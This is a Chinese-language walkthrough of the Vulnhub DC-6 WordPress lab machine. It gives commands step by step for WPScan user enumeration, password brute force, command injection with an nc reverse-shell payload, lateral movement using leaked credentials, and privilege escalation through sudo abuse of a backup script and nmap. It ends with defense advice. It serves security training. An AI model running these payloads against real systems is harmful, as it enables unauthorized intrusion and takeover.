DC-6靶机渗透测试实战教学文档

0x00 靶机概述

DC-6是Vulnhub上的一个WordPress靶机，难度中等，涉及以下技术点：

• 主机发现与端口扫描
• WordPress站点信息收集
• WPScan工具使用
• WordPress后台爆破
• 命令注入漏洞利用
• 权限提升技术
• 横向移动技术

0x01 环境准备

靶机下载

• 下载地址：https://www.vulnhub.com/entry/dc-6,315/
• 网络模式：NAT模式

攻击机准备

• Kali Linux
• 必要工具：nmap、dirsearch、wpscan、netcat

0x02 信息收集阶段

1. 主机发现

arp-scan -l

发现靶机IP：192.168.190.134

2. 端口扫描

nmap -sS 192.168.190.134

发现开放端口：

• 80端口（HTTP）
• 22端口（SSH）

3. Web服务探测

访问http://192.168.190.134会跳转到http://wordy/，需要修改本地hosts文件：

echo "192.168.190.134 wordy" >> /etc/hosts

4. 目录扫描

python3 dirsearch.py -u http://192.168.190.134/

发现关键路径：

• /wp-login.php（WordPress后台登录页面）

0x03 漏洞利用阶段

1. WordPress用户枚举

使用WPScan枚举用户：

wpscan --url http://wordy -e u

发现5个用户：

• admin
• graham
• sarah
• mark
• jens

将用户保存到user.txt文件：

admin
graham
sarah
mark
jens

2. 密码爆破

准备密码字典：

cp /usr/share/wordlists/rockyou.txt.gz /home/kali/
gunzip rockyou.txt.gz

执行爆破：

wpscan --url http://wordy -P rockyou.txt -U user.txt

爆破成功获得凭证：

• mark/helpdesk01

3. 后台登录

使用mark/helpdesk01登录WordPress后台

4. 命令注入漏洞利用

在后台找到可执行命令的功能点，抓包发现存在命令注入漏洞

攻击机开启监听：

nc -lvnp 5678

修改请求包注入命令：

qq.com|nc -e /bin/bash 192.168.190.128 5678

获取交互式shell：

python -c 'import pty;pty.spawn("/bin/bash")'

0x04 权限提升阶段

1. 横向移动

查看mark用户家目录：

cd /home/mark/stuff
cat things-to-do.txt

发现另一组凭证：

• graham/GSo7isUM1D4

通过SSH登录：

ssh graham@192.168.190.134

2. 权限提升路径1

检查sudo权限：

sudo -l

发现可以以jens用户身份无需密码执行/home/jens/backups.sh

查看backups.sh内容：

cat /home/jens/backups.sh

发现可以写入命令：

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens ./backups.sh

3. 权限提升路径2

再次检查jens的sudo权限：

sudo -l

发现jens可以以root身份执行nmap

利用nmap提权：

echo 'os.execute("/bin/bash")' >> shell
sudo nmap --script=shell

0x05 获取flag

切换到root目录查看flag：

cd /root
cat theflag.txt

0x06 总结与防御建议

渗透路径总结

1. 信息收集发现WordPress站点
2. WPScan爆破获得后台凭证
3. 利用命令注入获取初始shell
4. 通过用户目录信息实现横向移动
5. 利用sudo配置不当实现权限提升

防御建议

1. 使用强密码策略
2. 限制sudo权限
3. 修复命令注入漏洞
4. 敏感信息不应存储在用户目录
5. 及时更新WordPress及插件